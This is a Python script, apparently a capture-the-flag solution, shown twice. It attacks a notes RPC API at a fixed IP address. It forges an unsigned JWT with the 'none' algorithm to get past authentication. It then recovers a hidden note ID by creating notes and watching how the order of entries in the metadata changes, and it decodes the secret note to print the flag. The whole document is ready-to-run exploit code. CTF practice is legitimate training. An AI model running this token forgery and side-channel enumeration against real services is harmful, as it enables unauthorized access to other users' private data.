amalmurali47 · July 1, 2018 15:49
diff --git a/brute_secret_note.py b/brute_secret_note.py
 #!/usr/bin/env python3

 import json
 from base64 import b64decode

 import requests as rq


 def rpc(method, data=None, post=False):
    headers = {
        'Authorization': 'eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6MX0.',
        'Content-Type': 'application/json',
        'Accept': 'application/notes.api.v2+json',
    }

    url = 'http://159.203.178.9/rpc.php?method={}'.format(method)

    if data:
        data = json.dumps(data)
        if post:
            # POST with params
            headers['Content-Length'] = str(len(data))
            return rq.post(url, headers=headers, data=data)
        else:
            # GET with params
            return rq.get(url, params=json.loads(data), headers=headers)
    elif post:
        # POST without params
        return rq.post(url, headers=headers)

    # GET request without params
    return rq.get(url, headers=headers)


 def get_note(ident):
    r = rpc('getNote', data={'id': ident})
    if r.status_code == 200:
        return r.json()['note']


 def epochs():
    r = rpc('getNotesMetadata')
    if r.status_code == 200:
        return r.json()['epochs']
    return None


 def reset():
    r = rpc('resetNotes', post=True)
    if r.status_code == 200:
        return r.json()['reset']
    return None


 def create(ident, note='a'):
    r = rpc('createNote', data={'id': ident, 'note': note}, post=True)
    if r.status_code == 400:
        return False
    elif r.status_code == 201:
        return True
    return None


 def where(a, b):
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y:
            return i
    return min(len(a), len(b))


 def search(head, secret=0):
    if head is '':
        alpha = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
    else:
        alpha = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

    i_min, i_max = 0, len(alpha) - 1
    old_epochs = epochs()
    tries = []

    while i_min + 1 != i_max:
        print('Search space: ', end='')
        for i, c in enumerate(alpha):
            print(['\x1B[0m', '\x1B[7m'][(i_min <= i) and (i <= i_max)] + c, end='')
        print('\x1B[0m')

        i = (i_max + i_min) // 2

        print('Trying', head + alpha[i])
        r = create(head + alpha[i])

        new_epochs = epochs()
        ind = where(old_epochs, new_epochs)
        old_epochs = new_epochs

        if r is None:
            print('Something has gone terribly wrong.')
            exit(1)
        elif r is False:
            secret_note_id = head + alpha[i]
            return secret_note_id

        if ind <= secret:
            secret += 1
            i_min = i
        elif ind > secret:
            i_max = i

    return search(head + alpha[i_min], secret)


 reset()
 secret_note_id = search('')
 print('\nFound secret note ID: {}'.format(secret_note_id))

 encoded_flag = get_note(secret_note_id)
 decoded_flag = b64decode(encoded_flag).decode('utf-8')
 print(u'\nFlag found 💃💃💃: {}'.format(decoded_flag))
	#!/usr/bin/env python3

	import json
	from base64 import b64decode

	import requests as rq


	def rpc(method, data=None, post=False):
	headers = {
	'Authorization': 'eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6MX0.',
	'Content-Type': 'application/json',
	'Accept': 'application/notes.api.v2+json',
	}

	url = 'http://159.203.178.9/rpc.php?method={}'.format(method)

	if data:
	data = json.dumps(data)
	if post:
	# POST with params
	headers['Content-Length'] = str(len(data))
	return rq.post(url, headers=headers, data=data)
	else:
	# GET with params
	return rq.get(url, params=json.loads(data), headers=headers)
	elif post:
	# POST without params
	return rq.post(url, headers=headers)

	# GET request without params
	return rq.get(url, headers=headers)


	def get_note(ident):
	r = rpc('getNote', data={'id': ident})
	if r.status_code == 200:
	return r.json()['note']


	def epochs():
	r = rpc('getNotesMetadata')
	if r.status_code == 200:
	return r.json()['epochs']
	return None


	def reset():
	r = rpc('resetNotes', post=True)
	if r.status_code == 200:
	return r.json()['reset']
	return None


	def create(ident, note='a'):
	r = rpc('createNote', data={'id': ident, 'note': note}, post=True)
	if r.status_code == 400:
	return False
	elif r.status_code == 201:
	return True
	return None


	def where(a, b):
	for i, (x, y) in enumerate(zip(a, b)):
	if x != y:
	return i
	return min(len(a), len(b))


	def search(head, secret=0):
	if head is '':
	alpha = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
	else:
	alpha = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

	i_min, i_max = 0, len(alpha) - 1
	old_epochs = epochs()
	tries = []

	while i_min + 1 != i_max:
	print('Search space: ', end='')
	for i, c in enumerate(alpha):
	print(['\x1B[0m', '\x1B[7m'][(i_min <= i) and (i <= i_max)] + c, end='')
	print('\x1B[0m')

	i = (i_max + i_min) // 2

	print('Trying', head + alpha[i])
	r = create(head + alpha[i])

	new_epochs = epochs()
	ind = where(old_epochs, new_epochs)
	old_epochs = new_epochs

	if r is None:
	print('Something has gone terribly wrong.')
	exit(1)
	elif r is False:
	secret_note_id = head + alpha[i]
	return secret_note_id

	if ind <= secret:
	secret += 1
	i_min = i
	elif ind > secret:
	i_max = i

	return search(head + alpha[i_min], secret)


	reset()
	secret_note_id = search('')
	print('\nFound secret note ID: {}'.format(secret_note_id))

	encoded_flag = get_note(secret_note_id)
	decoded_flag = b64decode(encoded_flag).decode('utf-8')
	print(u'\nFlag found 💃💃💃: {}'.format(decoded_flag))